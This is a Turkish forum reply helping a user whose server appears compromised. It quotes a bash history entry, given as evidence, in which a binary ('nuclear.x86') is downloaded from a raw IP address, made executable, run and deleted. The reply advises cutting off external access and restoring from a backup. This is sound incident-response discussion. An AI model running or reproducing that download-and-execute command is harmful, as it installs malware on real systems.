OguzhanLevent adlı üyeden alıntı: mesajı görüntüle
[root@serversite ~]# find /home -type f -name "*.php" -mmin -720 \
> ! -path "*/cache/*" \
> ! -path "*/var/cache/*"
[root@serversite ~]#
Bu şekilde bir arama yaptığım zaman sonuç çıkmıyor.

fakat history de

  946  2026-04-30 13:03:59 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777543440072006405__
Böyle bir şey var.
Sunucunda direk payload çalıştırılmış.
dış erişimi tamamen kesip sunucu yedeğini bulmanda fayda var.
Hizmet aldığın sağlayıcı ile görüşüp yedek noktasında bilgi almanı ve 1-2 gün önceye dönmeni tavsiye ederim.
Aksi takdirde ne yaparsan yap tamamen kurtulman çok zor çünkü zararlı bir binary çalıştırılmış durumda. Bu noktada yedekten geri dönmek doğru seçenek olacaktır.